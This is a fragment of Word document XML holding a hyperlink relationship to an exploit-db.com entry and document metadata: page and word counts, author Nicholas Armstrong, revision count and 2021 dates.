Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/5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4920</TotalTime>
  <Pages>147</Pages>
  <Words>43721</Words>
  <Characters>249210</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2076</Lines>
  <Paragraphs>584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Armstrong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nicholas Armstrong</cp:lastModifiedBy>
  <cp:revision>115</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-24T02:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-27T13:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>